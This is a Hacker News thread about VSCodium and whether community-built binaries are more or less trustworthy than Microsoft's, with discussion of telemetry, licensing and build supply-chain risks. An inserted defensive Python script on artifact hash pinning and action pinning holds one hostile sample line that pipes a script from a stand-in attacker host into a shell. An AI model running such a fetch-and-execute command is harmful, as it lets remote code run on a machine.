[HN Gopher] VSCodium - Open-source binaries of VSCode
___________________________________________________________________
VSCodium - Open-source binaries of VSCode
Author : Brajeshwar
Score : 407 points
Date : 2023-09-04 15:20 UTC (7 hours ago)
(HTM) web link (vscodium.com)
(TXT) w3m dump (vscodium.com)
| hmry wrote:
| Just had to switch away from an open source build yesterday
| because after updating, Pylance seems to have stopped working due
| to DRM. Whenever it booted up, it just displayed a big warning
| about how using it with non-MS-sanctioned builds is a violation
| of the license, and promptly locked up.
| inetknght wrote:
| sounds like a reason to not use Pylance
| maxloh wrote:
| You can use pyright instead[0]. It is the FOSS version of
| pyright, but with some features missing.
|
| [0]: https://github.com/microsoft/pyright
| loloquwowndueo wrote:
| Vscode is designed to fracture https://ghuntley.com/fracture/
| eddythompson80 wrote:
| by that definition, I'm finding it really hard to think of any
| product that allows for extensibility/extensions that won't be
| "designed to fracture".
| omoikane wrote:
| Previously discussed in 2022:
| https://news.ycombinator.com/item?id=32657709
|
| Summary: Microsoft releases Visual Studio Code with telemetry
| built in, so other projects (e.g. VSCodium) have spun up to
| release custom builds without telemetry. But these projects
| can't use the same marketplace because they are not licensed by
| Microsoft, hence the "fracture" in the title of this article.
| It goes on to say that other proprietary IDEs are also
| problematic, and GitHub is a trap to capture and fracture
| developers.
|
| This drama with Microsoft and open source reminds me of the
| Halloween documents:
|
| http://www.catb.org/~esr/halloween/
| SV_BubbleTime wrote:
| The main point that post _eventually_ gets to is that Microsoft
| made the best IDE and the best extensions... so now it's hard
| to not use Microsoft with all the bad things that implies.
|
| Um... OK?
|
| I mean... Use it or don't. I'm not sure, "it's just too good
| not to use" is a legitimate complaint.
| BossingAround wrote:
| Can you change font size of the menus in VSCodium nowadays? I
| couldn't do that some time ago, and it was, quite honestly, a
| deal breaker for me.
| dewey wrote:
| I saw another mention of this in the comments. How can this be
| affected by "removing tracking and branding and building our
| own binaries"?
|
| Shouldn't they be almost the same minus these small MS specific
| bits?
|
| I think this would make me even more hesitant to use it if it
| introduces subtle changes / maybe bugs into the equation.
| banana_giraffe wrote:
| Can you do this in VS Code?
|
| You can set the window Zoom Level to change all of the font
| sizes, including the menu, but afaik, there's no option for
| just the menu font size.
| hedora wrote:
| At least under Linux, the menus are native widgets so you set
| the menu font size under system settings.
|
| I guess if you want one size of menu font for VS Code, and a
| different size for everything else, then that's a problem.
|
| That seems like a pretty narrow corner case though.
| stonogo wrote:
| Linux doesn't have native widgets. Are we talking GTK or QT
| here?
| semiquaver wrote:
| This project is mostly useless, and I say that as someone who
| uses ungoogled chromium as their primary browser.
|
| The only apparent practical reason for this to exist is to
| disable telemetry. But the telemetry built into VSCode can
| already be completely disabled by configuration. And if you don't
| trust that configuration to do what it says on the tin you should
| also not trust a piece of software built from the same source.
| mcpackieh wrote:
| Are VSCode builds reproducible?
| [deleted]
| bobim wrote:
| Interesting point, I'm using Codium exactly for this wrong
| reason then. In the end trusting or untrusting without the
| intellectual capacity required to verify is no different from
| faith. That's maybe why 100 rabbits' approach to computing
| with uxn is so appealing.
| zogrodea wrote:
| I think trust is a strict synonym of faith, capacity to
| verify or no. Trust means to believe someone's claims,
| without certain 100% demonstrative proof. It ceases to be
| trust when you verify the claims yourself, but the capacity
| to verify makes no difference to what it is.
|
| Not that trust is bad or anything. I remember hearing from
| someone that it used to be safe to keep house doors open,
| because people trusted each other, and that it's safe for a 6
| year old girl to travel by train alone in some places. Can't
| help but feel we have lost something.
| infamia wrote:
| With Vscodium you also aren't exposed to all the closed source
| extensions (e.g. Pylance). MS aggressively pushes proprietary
| extensions on everyone, which does only heaven knows what to
| your data and machine. Vscode is for all practical purposes open
| core surrounded by a lot of closed source. This despite the
| fact that they like to pretend they altruistically love open
| source.
|
| Same old MS as ever. Only trust what you can verify with that
| lot.
| [deleted]
| vvpan wrote:
| Arch has, what I think is, an equivalent package simply called
| "code".
| [deleted]
| capableweb wrote:
| `code` is the binary, but the "project" itself is `Code - OSS`
| as listed on
| https://wiki.archlinux.org/title/Visual_Studio_Code
|
| It is the package the main repository exposes, for VSCodium or
| Visual Studio Code you need to use the AUR.
| lfc07 wrote:
| Use Emacs, guys, if it is so bothersome. Emacs is faster and more
| resource efficient than all these modern IDEs/editors.
| kenny11 wrote:
| This argument makes me smile as someone who is old enough to
| remember when Emacs stood for "eight megabytes and constantly
| swapping".
| mcpackieh wrote:
| The old GNU mentality of ignoring performance optimization
| because computer hardware would catch up eventually actually
| did pay off.
| yaantc wrote:
| Same here ;) But now there's "8 GB and constantly swapping":
| Eclipse! I logged once on a dev server to test something, it
| was slow and I checked what was going on. On this 64 GB
| machine, 8 Eclipse users, each Eclipse using a tad over 8 GB,
| led to significant swapping. What a world!
| BearhatBeer wrote:
| It also has a consistent interface that YOU control yourself.
| Downside is you need an IQ of at least 95 to use it.
| mardifoufs wrote:
| Vscode is super easy to configure yourself. I'd argue
| probably easier to customize fully than emacs for the average
| user. That's the whole point of using it versus a fully
| fledged opinionated IDE.
| BearhatBeer wrote:
| The average user can barely hit the space bar with their
| forehead. Creating programming tools designed for the
| average user will always be a study in mediocrity.
| uw_rob wrote:
| Configuring emacs isn't a test of intelligence, it's a
| test of investment. I wish the mindset that conflates
| intelligence and investment would go away.
|
| Software is going to continue to play a bigger influence
| on everyones life. The majority of this software is going
| to be written by engineers of average intelligence.
| Having tools that are easier for everyone to use will
| make your life better down the line too.
| [deleted]
| dr_kretyn wrote:
| > Libre open source
|
| It's like a "quantum plasma" of razors but for "hackers" of
| hacker news
| [deleted]
| alias_neo wrote:
| I used this for ages, and asked my team to use it, but I gave up
| in the end; without the remote SSH capabilities and
| devcontainers, Microsoft have a tight hold on using VSCode to the
| max.
|
| On top of that, they seem to have relented in the telemetry and
| it can be fully disabled now (though I haven't tested the truth
| of "off").
| baristaGeek wrote:
| Keep it going! Our startup's extension is listed on Open VSX
| Registry and we're very happy doing so.
| pcdoodle wrote:
| I heard MS was discontinuing mac support, does this release
| change anything?
| wyozi wrote:
| This is about VSCode. MS is discontinuing Mac support for
| Visual Studio.
| moonchrome wrote:
| It's not even support for visual studio - it's a completely
| different product spun out of monodevelop they acquired with
| xamarin.
|
| Anything xamarin related (MAUI, VS for Mac) is an extreme level
| of garbage - such low standard of quality is really doing
| .NET/Visual Studio brands a disservice.
| qwytw wrote:
| Seems that they've pretty much just bought Xamarin to kill
| it (besides actually properly porting .NET itself to other
| platforms which they could've done anyway). It seemed like
| a pretty cool product showing some promise 7-8 years ago.
| apfsx wrote:
| Pretty sure that's only for Visual Studio not VS Code.
| qwytw wrote:
| They are discontinuing Visual Studio for Mac aka Xamarin Studio
| aka Monodevelop.
|
| Visual Studio Code is a completely different product (to be
| fair so is Visual Studio itself for that matter..)
| Evidlo wrote:
| Why did Microsoft overload the "Visual" keyword so much? It's
| almost a joke at this point.
|
| Visual Studio Code, Visual Studio, Visual Basic .NET, Visual
| Basic Classic, VBScript.
|
| Am I forgetting anything?
| SoftTalker wrote:
| Visual Source Safe, but that's best forgotten.
| Pxtl wrote:
| Microsoft has always been terrible at naming things.
|
| Their word processor is called Word. Their sql server is
| called Sql Server. Their IM is called MSN Messenger/Windows
| Live Messenger/Messenger/Skype/Lync/Skype For
| Business/Teams
| wvenable wrote:
| Don't all companies do that. Even Apple isn't immune with
| the ridiculously named AirPods Max.
| dagw wrote:
| Visual C++, Visual J++, Visual FoxPro, Visual SourceSafe,
| [deleted]
| wlesieutre wrote:
| Different software, Visual Studio Code is continuing, Visual
| Studio for Mac is being discontinued.
| dang wrote:
| Related:
|
| _VSCodium - Free /Libre Open Source Software Binaries of VS
| Code_ - https://news.ycombinator.com/item?id=31604932 - June 2022
| (430 comments)
|
| _VS Code without Microsoft branding /telemetry/licensing_ -
| https://news.ycombinator.com/item?id=23447413 - June 2020 (200
| comments)
|
| _VSCodium - An Open Source Visual Studio Code Without Trackers_
| - https://news.ycombinator.com/item?id=19650109 - April 2019 (253
| comments)
|
| _VSCodium: 100% Open Source Version of vs. Code_ -
| https://news.ycombinator.com/item?id=19619956 - April 2019 (8
| comments)
|
| _VSCodium: Binary releases of VSCode without MS branding,
| telemetry and licensing_ -
| https://news.ycombinator.com/item?id=17850960 - Aug 2018 (113
| comments)
| haolez wrote:
| Maybe I'm a bit paranoid, but I find it harder to trust the
| binaries generated by such a project than the ones provided by
| the Big Techs (even though they are the biggest stalkers).
|
| I'm afraid that such projects, with much less man power and skin
| in the game, are more vulnerable to supply chain attacks or a
| hostile takeover if a dev sells the project.
|
| I'm not very knowledgeable in this area. Would someone contribute
| here some resources on how this is avoided in such projects? Or
| maybe my concerns are valid :)
| ninjha wrote:
| I would have assumed the win here would be that your Linux
| distribution or package manager on another OS can compile
| "VSCodium" themselves -- and you already trust them for all
| your other software, so this simplifies the trust chain
| somewhat.
|
| In reality I think distributions that are willing to ship
| binaries (NixOS, Homebrew on MacOS) ship VSCodium, and other
| distributions (Alpine) have packages called things like
| `code-oss` that are basically the distribution's internal compiled
| version of VSCode and have nothing (?) to do with VSCodium.
| Barrin92 wrote:
| It's not paranoid, the scepticism is completely warranted as
| this is security theatre. People are afraid Microsoft will
| screw them over with a text editor but run random binaries
| provided by people for whom a thousand bucks may as well be
| enough motivation to ship you malware.
|
| It's like buying your heart medication off an anonymous guy on
| Craigslist to stick it to big pharma.
| RunSet wrote:
| Buying it for libre dollars and free cents.
| skybrian wrote:
| Yes, I also trust the original company more, for now. It would
| be nice to have more choices.
|
| Reproducible builds would help here, like Go did for their
| newest SDK [1].
|
| This would be particularly true for a fork when the source
| changes are fairly minimal, since you could just verify the
| patch.
|
| Linux distros are fairly similar; why do we mostly trust Debian
| packages? Because there's an umbrella organization and a
| process. That's less true of a standalone organization.
|
| Maybe eventually there will be an umbrella organization that
| just does reproducible builds, and people will use that to
| distribute binaries. (And independent verification could keep
| them honest, like happens with domain registrars.)
|
| [1] https://go.dev/blog/rebuild
| brnt wrote:
| Vscode packaging as/is famously not public. Plus, trust to do
| what exactly? Come with telemetry flipped on?
| haolez wrote:
| Good point. That's one problem that might be well solved by
| something like BitTorrent, which hashes all the files as part
| of the protocol. Once a binary gets analyzed and trusted (the
| current binary, not the process or every new upgrade), it can
| be safely used.
| slim wrote:
| it is less vulnerable simply because it's less used. hackers
| target the supply chain with the majority of consumers
| asddubs wrote:
| I think skin in the game is the big one, much moreso than
| manpower. I use a lot of things that are probably mostly one-
| person projects, but if that person poured their love and time
| into it, it seems unlikely they'd permanently tarnish not just
| their reputation, but also the thing they spent all this time
| on. If you're just setting a couple compile flags and changing
| a name, I am a little more suspicious
| beAbU wrote:
| This is what happened to FileZilla I think?
| davidgerard wrote:
| It could be much worse - you could install the official vendor
| binary, which is known to contain spyware.
| 3np wrote:
| Example Arch AUR but similar for Nix, Guix, Gentoo, others:
|
| On first install:
| - read AUR file
| - audit build & patching framework
| - audit patches
|
| On upgrade:
| - review patch changes
| - treat upstream changes like you would otherwise
|
| On upgrade with AUR file change:
| - review AUR file changes
| - review build & patching framework changes
|
| If you've bothered to set up your own repos and build pipeline
| integrating your patches already (and you can get a lot of that
| for free), the additional overhead isn't as large as it may
| sound.
|
| vscodium is doing the much larger work of cross-checking vscode
| and in exchange I do the smaller work of cross-checking theirs
| - and putting in my own so I have zeroconf installs with
| prebundled extensions and whatnot on new machines.
|
| Same for browser (ungoogled-chromium, vanadium, librewolf or
| whathaveyou)
| hedora wrote:
| I just installed vscodium on my manjaro machine. It built from
| the AUR source.
|
| I'm sure you could diff the source code the package used, and
| the upstream Microsoft git SHA it claims to be derived from:
|
| https://aur.archlinux.org/packages/vscodium
|
| Incidentally, there is now an open source remote mode
| extension, so I have no reason to use the proprietary version.
| No more telemetry from me!
| yencabulator wrote:
| > there is now an open source remote mode extension
|
| URL please? Open VSX lists several but it's hard to evaluate
| if they're complete & stable from just the READMEs. For
| example, https://github.com/xaberus/vscode-remote-oss has
| existed for a long time, but one would need to spend a few
| hours to know if it works well enough.
| dataflow wrote:
| I've never tried this, but in theory, if these projects produce
| builds on GitHub Actions and you trust Microsoft's security,
| then you should be able to just look at the commit hash that
| got pulled in the action and diff that against upstream and
| just study that. If the diff looks safe [1] then I think that
| implies the binary can be trusted.
|
| [1] Of course this includes ensuring it doesn't e.g. pull
| anything from the internet whose integrity you can't similarly
| guarantee...
| krick wrote:
| Somebody please bother to explain why this is downvoted. The
| reasoning seems perfectly valid. Of course, there are a lot
| of ways how somebody could fuck up, but _in theory_ automated
| builds on github have the same trustworthiness guarantees as
| Microsoft's very own VSCode binaries.
| danpalmer wrote:
| Your concerns are absolutely valid. Without casting any
| judgement on this project, the process of taking, modifying,
| and redistributing is hard to do in a trustworthy way. Big
| companies go to extreme lengths to ensure a chain of trust of
| the software they build, and app distribution platforms[^1] go
| to extreme lengths to ensure a full chain of trust
| end-to-end[^2] from developer to apps running on users' devices.
|
| There's basically no way to do this without trusting the
| redistributor in addition to the original publisher, but some
| things can reduce the amount of trust. Having a verifiable
| build process, that checks signing keys and hashes, that
| re-signs, etc, that all helps. If end-users can theoretically
| produce exactly the same build themselves it's easier to trust
| it.
|
| The best option however is for the source project to produce
| unbranded builds themselves, and potentially for a project like
| VSCodium to become "config only" for things like disabling
| telemetry, and therefore not requiring re-signing. The Chromium
| project distributes its own Chromium binaries which lack the
| Google-specific stuff for example.
|
| [^1]: Mostly thinking of app stores, but the same is basically
| true of things like Debian package repositories.
|
| [^2]: App stores typically re-sign in the middle, so you do
| have to trust the store, but see (1), these companies go to
| great lengths to ensure trustworthiness there.
| sqeaky wrote:
| Trusting "big companies" because we presume they have guard
| rails seems like a bad idea, it is how we got the solar winds
| supply chain attack.
|
| When I worked for one of the largest voting machine companies
| I was astounded how the final build process for the software
| was done just before it was sent to the customer. It was
| built on a Jenkins server that several people had access to
| change and update with minimal oversight and the devops
| person had freedom to do anything to with no oversight. For
| the year I worked there this one man could have changed
| dozens of elections if he chose to and figuring it out would
| have been very hard. I am sure a large enough investigation
| could have figured out such a thing, but by then the
| damage would already be done. If he changed only municipal
| elections that couldn't afford such an investigation it might
| never have been done. I have no reason to claim this
| happened, but we certainly can't prove it didn't and this is
| in one of the most paranoid and regulated spaces in software
| development.
| danpalmer wrote:
| I'm speaking from experience at Google, and honestly our
| software integrity processes are like nothing I could have
| imagined coming in. Not everything is perfect and it has
| clearly evolved over time, but basically for a modern
| internal Google codebase I don't think I could have much
| more trust that it is what it claims to be.
|
| I don't know if other big tech is quite the same, but from
| the little I've heard, I suspect that Microsoft, Amazon,
| Apple, and others in that ilk are similar.
|
| I'm very much in the camp of "trust but verify" here.
| You're right that Solar Winds was an utter disaster. It
| should never have been able to happen.
| dv_dt wrote:
| Microsoft has had some serious recent faults in their
| fundamental handling of a couple of areas (like driver
| signing! https://news.ycombinator.com/item?id=37261500).
| MaxBarraclough wrote:
| And that's on top of Azure's recent appearance in the
| news.
|
| https://news.ycombinator.com/item?id=36979532 (
| _Microsoft comes under blistering criticism for "grossly
| irresponsible" security_ )
| phillipcarter wrote:
| Trusting "open source" is also how we get tons of other
| kinds of vulnerabilities, but that doesn't mean open source
| is unworthy of trust.
|
| The reason why organizations turn to other companies to
| deliver this is because there's a "throat to choke" for
| when things go wrong and a financial incentive to fix the
| inevitable issues when they come up.
| Nullabillity wrote:
| The best option would have been for the source project to not
| be distributing malware in the first place.
| gustavus wrote:
| Ya I used to buy into that idea about using vendor products
| with the rationale that "at very least they wouldn't want to
| get sued for negligence so they have to have some basic
| security in place" then that huge bug came out where you got
| root access in Azure if you simply didn't send an AuthN
| header.
| justinhj wrote:
| Well let's not forget the importance of being able to sue.
| You use free software without warranty there is nobody to
| sue.
| MaxBarraclough wrote:
| You can use a commercial (paid-for) Linux distro if you
| really want the legal protections of being a customer,
| while staying with Free and Open Source software.
|
| As Capricorn2481 points out though, suing isn't really on
| the cards for most individuals.
| yencabulator wrote:
| Good luck trying to sue Microsoft over a security
| vulnerability.
| mcny wrote:
| I think it is worth mentioning here that Microsoft does
| not care about user privacy.
|
| I don't know if this is because Microsoft took down the
| blog posts and press releases or because Google web
| search sucks now (different conversation) but I had
| trouble finding the source for Microsoft statement. I'm
| talking about the incident when Microsoft spied into a
| user's hotmail email contents.
|
| > However, to determine the identity of the leaker, CNET
| reveals, Microsoft actually looked through the Hotmail
| email of a French blogger who was in contact with the
| leaker, and make available online early copies of Windows
| 7 and Windows 8, as well as means that allowed users to
| circumvent activations protection for Microsoft and
| Windows.
|
| https://bgr.com/general/microsoft-hotmail-and-outlook-
| privac...
|
| I wouldn't give Microsoft any benefit of the doubt. While
| I have utmost respect for the people (who I know and) who
| work there, the senior leadership has always been poopy
| at best. I would never trust a word they say.
| Capricorn2481 wrote:
| "Yeah but you can sue" is not really that viable. How's
| that going for anybody? Not everyone can dedicate their
| time and savings to gambling on getting compensated. At
| the very least, the open source community is vigilant and
| quick to ostracize bad actors. Big tech companies get tax
| breaks to screw us over
| fallat wrote:
| > There's basically no way to do this without trusting the
| redistributor in addition to the original publisher, but some
| things can reduce the amount of trust. Having a verifiable
| build process, that checks signing keys and hashes, that
| re-signs, etc, that all helps. If end-users can theoretically
| produce exactly the same build themselves it's easier to
| trust it.
|
| Really what much else could you ask for?
|
| It only takes 1 trusted friend to verify the codebase, and
| from there it can spread. Luckily there are a lot of talented
| people on the Internet whom several people can vouch for,
| easy to find. It's pretty much a non-problem in the age of
| the Internet.
|
| The same natural logic applies to anything else really...
| like cars - "yo what car do you trust?"
|
| It's just the nature of living. If you don't have the skills,
| you need to find someone who does to trust. And no just
| because it comes from a company doesn't mean you can trust
| it, that's a fallacy. "Safety" doesn't necessary equate to
| "profits" which is what a business needs to live. It's an
| organism.
| danpalmer wrote:
| I'm certainly not equating safety to profits, but I think
| that a company such as Microsoft with decades of experience
| distributing cryptographically verified software to a range
| of demanding consumers (e.g. governments) and being big
| enough to be able to have teams running things like their
| certificate authority infrastructure, is much more likely
| to produce secure binary distributions than some GitHub
| Actions and shell scripts.
|
| I don't think your car analogy quite fits, as there are
| ongoing updates, and it's not like the end-user perception
| of regular VSCode, or backdoored VSCode, are going to be
| any different until someone spots the backdoor (and we
| can't rely on that).
| yencabulator wrote:
| Meanwhile in the real world, Microsoft is actively
| screwing up, losing control of their signing keys,
| failing to implement even the basics of Azure
| authentication, destroying Azure customer VM security,
| and so on.
|
| https://news.ycombinator.com/item?id=37261500
|
| https://news.ycombinator.com/item?id=28347141
|
| https://news.ycombinator.com/item?id=28532531
| fallat wrote:
| Seems your assumptions about their practices are wrong
| based on the other comment, but let's pretend that's the
| truth.
|
| Why would a GitHub Action be worse? You're just telling
| me it is, asking me to believe that...
|
| The car analogy is just that - you can break any analogy
| if you try. You've got a better one to help prove me
| right? :)
| [deleted]
| wredue wrote:
| >big companies go to great lengths to ensure chain of trust
|
| lol.
| croes wrote:
| Isn't VSCodium just VSCode without the telemetry code?
|
| So if there is a supply chain risk it's the same for VS Code
| krick wrote:
| You're missing the point. GP is discussing binaries. I.e.,
| the assumption is that published source code (on Github) is
| perfectly fine, and then either the (malign) developer is
| changing the code before compiling it, or the (malign) third
| party is somehow using some vulnerability to replace the
| official binaries with compiled code of their own. And then
| you think that you are using "VSCode without the telemetry
| code", but in reality you're running a botnet.
| Retr0id wrote:
| The supply chain does not end at the source code.
| croes wrote:
| What does VSCodium add?
| jamesgeck0 wrote:
| If their CI is one day compromised by an attacker,
| potentially anything.
| croes wrote:
| Just like MS's CI, and I guess MS is the more valuable
| target.
| fredoliveira wrote:
| But one might also assume, the hardest target to actually
| hit.
| d0mine wrote:
| - option A: definite known spyware;
| - option B: maybe potentially one day there is an attack/take over.
|
| The choice is obvious.
| gostsamo wrote:
| this is using the ms source, just not the logo and signing key.
| should be as safe as they come.
| robinwassen wrote:
| The problem is most likely how do you know it's the ms source
| unmodified?
| wheelerof4te wrote:
| You don't, unless you build it yourself.
|
| That's the key value of open-source projects. You don't
| have to release a binary, just source code and a build
| guide. It's also one of the reasons why I have such high
| respect for OS distributions like BSDs and Slackware. They
| give you a good base that you can build upon if you know
| what you're doing.
|
| The problem is, many PC users don't really know what
| they're doing.
| no_wizard wrote:
| >many PC users
|
| I'd say most, even software engineers.
|
| Can't tell you how many times I've had to explain how
| environmental variables work to developers, and that's a
| pretty simple concept compared to many other things in an
| operating system.
| Pxtl wrote:
| Most people cut their teeth on Windows, where the system
| environment vars are basically just a section of the
| registry.
| vorticalbox wrote:
| Because the repo uses GitHub Actions to pull changes and
| build the binary
|
| https://github.com/VSCodium/vscodium/blob/master/.github/wo
| r...
| danpalmer wrote:
| Having had a quick look through this workflow it seems to
| miss _most_ opportunities to ensure a safe build.
|
| - Downloads binaries for use in build with no
| hash/signing verification.
|
| - Doesn't pin shared actions.
|
| - Uses Yarn to install dependencies (which can involve
| downloading/executing arbitrary code from anywhere)
|
| - Doesn't sign the final binary.
|
| None of this is necessarily _wrong_ , all would make
| maintenance harder in the long run, but it means this
| project is really about removing MS branding and some
| telemetry, and that there is a security trade-off to get
| those benefits.
| benatkin wrote:
| None of these are a big deal.
|
| > - Downloads binaries for use in build with no
| hash/signing verification.
|
| It downloads them using TLS.
|
| > - Doesn't pin shared actions.
|
| The shared actions are just @actions/checkout and
| @actions/setup-node. They're official. I wouldn't pin
| them - YAGNI.
|
| > - Uses Yarn to install dependencies (which can involve
| downloading/executing arbitrary code from anywhere)
|
| It downloads/executes code based on the carefully chosen
| dependencies
|
| > - Doesn't sign the final binary.
|
| That's platform dependent I think. For Mac OS X it does.
|
| Seems like FUD, which you might be able to recognize
| because you say "None of this is necessarily wrong".
| Especially the part about pinning first party GitHub
| Actions. There would be nothing wrong with that but it is
| much more useful to pin third party GitHub Actions, and
| IMHO suboptimal to pin first party actions.
| vladvasiliu wrote:
| Isn't the whole point of this comment thread
| "vulnerabilities to supply chain attacks"?
|
| >> - Downloads binaries for use in build with no
| hash/signing verification.
|
| > It downloads them using TLS.
|
| If the binary is updated to a shady version, sure, no one
| will be able to tamper with the download, they're certain
| to have received the correct shady stuff.
| danpalmer wrote:
| Ah yes it does sign on macOS.
|
| I don't think it's quite FUD, but I do agree none of
| these are strictly necessary, all can be rationalised as
| unnecessary and for many users this project probably
| provides a perfectly reasonable security posture. However
| the fact that there's so little explicit acknowledgement
| of the security concerns, and that 2 minutes looking at
| the repo turned these things up, suggests that security
| is not a priority of the project. Again, not the wrong
| thing to do, but maybe not the trade-offs all users will
| want.
|
| Pinning actions is so low effort/high reward that even
| the low risk makes it worth it for a project like this in
| my opinion. Official actions are certainly much safer,
| but ultimately it's still just human review and PRs being
| merged.
|
| Downloading over TLS negates some impact of hash/signing
| verification, but it would be a nice extra layer. You're
| otherwise putting a lot of trust in the combination of
| DNS+CDN+Hosting. I've seen hijacked sites due to IPs
| being re-used on cloud providers for example. Unlikely,
| but again easy to do and high impact in the rare
| situation that it is taken advantage of.
|
| Yarn dependencies may be carefully chosen, I'm not
| familiar with the VSCode practices. I bet that official
| binaries however are not built like this - I'd bet that
| there are allowances for specific network connectivity
| and binary execution, and that everything else is locked
| down. To my knowledge GitHub Actions have open internet
| access. I wouldn't even say this is low risk either, the
| NPM ecosystem is so deeply nested that I'm sure malicious
| code could be snuck in somewhere. This is a lot harder to
| solve for this project, and certainly the most debatable
| aspect as to whether it's worth it or not.
| lozenge wrote:
| The yarn.lock includes checksums, if yarn is not checking
| checksums properly then that affects every project in
| Node.js, not just this one.
|
| Malicious code with the correct checksum? VSCode team is
| not auto updating dependencies but I also doubt they are
| reviewing the source code of every package they update.
| I've never worked anywhere that does. So yeah, "gulp-
| vinyl-zip" (or any other package used at build time)
| could add some code that secretly triggers when run in
| the VSCode repository and makes some malicious source
| code changes. But, it's still going to be the same code
| in VSCode and VSCodium. Unless the attacker decides to
| use specific logic to target one or the other.
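Editor's added example (not code from the thread, from VSCodium or from VS Code): danpalmer's two points above, pinning actions to commit SHAs and checking a downloaded binary against a digest rather than trusting TLS alone, and lozenge's reply that the yarn.lock integrity fields already cover the npm side, come down to three small checks a build pipeline can run. The script below implements them in Python on constructed data: the artifact bytes, the placeholder 40-hex commit value and the `some-org/release-helper` action name are hypothetical, and the digests are computed at run time rather than copied from any real release.

```python
"""Added example (editor's, not VSCodium's or VS Code's build code).

Three checks that move trust from "it arrived over TLS" to "it matches a
digest someone pinned at review time": a SHA-256 pin for a downloaded
artifact, an npm/yarn-style Subresource-Integrity check (the `integrity`
field in yarn.lock / package-lock.json), and a lint for GitHub Actions
`uses:` lines pinned to a movable tag instead of a full commit SHA.
All sample data is constructed here; digests are computed, not copied.
"""
import base64
import hashlib
import hmac
import re


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_sha256(data: bytes, pinned_hex: str) -> bool:
    """True iff the artifact matches the digest pinned in the build script.

    A replaced upstream file fails here even though TLS delivered it intact:
    the pin ties the build to the bytes a human actually reviewed.
    """
    return hmac.compare_digest(sha256_hex(data), pinned_hex.strip().lower())


_SRI_ALGOS = ("sha256", "sha384", "sha512")


def sri_from_bytes(data: bytes, algo: str = "sha512") -> str:
    """Produce an SRI string ('sha512-<base64 digest>') as a lockfile would."""
    if algo not in _SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(data: bytes, integrity: str) -> bool:
    """Check a package tarball against its lockfile `integrity` value.

    Only sha256/sha384/sha512 are accepted; a malformed or downgraded value
    (e.g. 'sha1-...') is rejected rather than silently skipped.
    """
    algo, sep, b64 = integrity.partition("-")
    if sep != "-" or algo not in _SRI_ALGOS:
        return False
    try:
        expected = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return hmac.compare_digest(hashlib.new(algo, data).digest(), expected)


_USES_LINE = re.compile(r"^\s*-?\s*uses:\s*(?P<ref>\S+)")
_PINNED_TO_SHA = re.compile(r"^[^@]+@[0-9a-f]{40}$")


def unpinned_actions(workflow_yaml: str) -> list[str]:
    """Return every `uses:` reference not pinned to a 40-hex commit SHA.

    Tags and branches (@v4, @main) can be moved by whoever controls the
    action's repository; a commit SHA cannot. Local actions (./path) and
    docker:// references are skipped: they are not resolved via a git ref.
    """
    bad = []
    for line in workflow_yaml.splitlines():
        m = _USES_LINE.match(line)
        if not m:
            continue
        ref = m.group("ref").strip("'\"")
        if ref.startswith("./") or ref.startswith("docker://"):
            continue
        if not _PINNED_TO_SHA.match(ref):
            bad.append(ref)
    return bad


# --- constructed demo data (hypothetical; not real release artifacts) ------
ARTIFACT = b"#!/bin/sh\necho 'pretend this is a prebuilt build tool'\n"
TAMPERED = ARTIFACT + b"curl https://attacker.invalid/x | sh\n"
PINNED_SHA256 = sha256_hex(ARTIFACT)       # what a reviewer would commit
LOCK_INTEGRITY = sri_from_bytes(ARTIFACT)  # what yarn.lock would record

# `some-org/release-helper` and the 40-hex value below are placeholders.
WORKFLOW = """\
jobs:
  build:
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - uses: ./.github/actions/local-step
      - uses: some-org/release-helper@main
"""

if __name__ == "__main__":
    print("pinned artifact ok:", verify_sha256(ARTIFACT, PINNED_SHA256))    # True
    print("tampered artifact ok:", verify_sha256(TAMPERED, PINNED_SHA256))  # False
    print("lockfile integrity ok:", verify_sri(ARTIFACT, LOCK_INTEGRITY))   # True
    print("unpinned actions:", unpinned_actions(WORKFLOW))
```

Run it as a script to see the four results. The design point is that in each check the thing the build trusts is a value that was committed and reviewed (the pinned hex, the lockfile integrity string, the commit SHA), not the registry, the CDN or the TLS session that delivered the bytes; the lint is the cheap step that turns `uses: actions/checkout@v4` into something a reviewer can diff.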
| benatkin wrote:
| > low effort/high reward
|
| Are there any shared actions that aren't actions/name-of-
| project? If not, that's zero reward.
| danpalmer wrote:
| The signing key is the important bit though right? This
| project breaks the chain of trust, as it clones the source
| repo, [does some shady stuff?] builds a new release, and
| uploads it to GitHub.
|
| It's unlikely that this project knowingly does shady stuff -
| I've heard of it before, seems to be a long running legit
| project - but there are lots of unverified factors in that,
| and the lack of signing (I think?) on the final binaries also
| means it's hard to know if they get tampered with at some
| other step.
| dist-epoch wrote:
| Your approach is valid, if you also avoid npm/pip/cargo/...
| packages. Otherwise...
| lathiat wrote:
| On the one hand there is 100% validity to what you say. On the
| other, people download entire trees of dependencies from pypi,
| npm, homebrew, independent non sandboxed apps, chrome
| extensions, etc.
|
| So don't lull yourself into thinking the supply chain on
| everything on your system is any better :) It's likely
| substantially worse.
| Xelbair wrote:
| with how the current tech world is, and after working in it,
| I'm the opposite.
|
| I have absolutely 0 trust towards any big corp doing things
| properly, and not cramming the applications full of spyware in
| the name of telemetry. and i would rather trust a bunch of
| insane dedicated people trying to make FOSS software.
| eternityforest wrote:
| I trust big tech more than most FOSS.
|
| I'm not worried about the government spying on me or ad
| tracking, I'm worried about a random hacker.
|
| It's ironic that for a lot of people the concept of privacy has
| been inverted: The closer someone is to you the more we want to
| hide from them.
|
| Facebook showing my online status to acquaintances(Or the lack
| of an online status, which could also create suspicion that I'm
| hiding something) bothers me more often than a random Google
| employee listening in through my alarm clock.
| pulpfictional wrote:
| It's not ironic, it's concern over the influence big tech
| yields over society with said data, unlike your concerns
| which are scoped on you and immediate.
| eternityforest wrote:
| The majority of people seem to have immediate-scoped
| concerns I suppose.
|
| Most of the really scary big data possibilities seems more
| like political issues than data issues, the data is just
| something they could use to do the things people are
| worried about.
|
| It's not great, but it's competing for mind share with a
| lot of other possible horrors people are afraid of and
| people are rather fatigued.
|
| The more subtle stuff they're already doing seems like it
| would be a problem with even the most basic data.
|
| The biggest issue I see is personalized content which
| causes fights, hate, wasted time, and all that, because the
| algorithms want you to engage with it as much as possible,
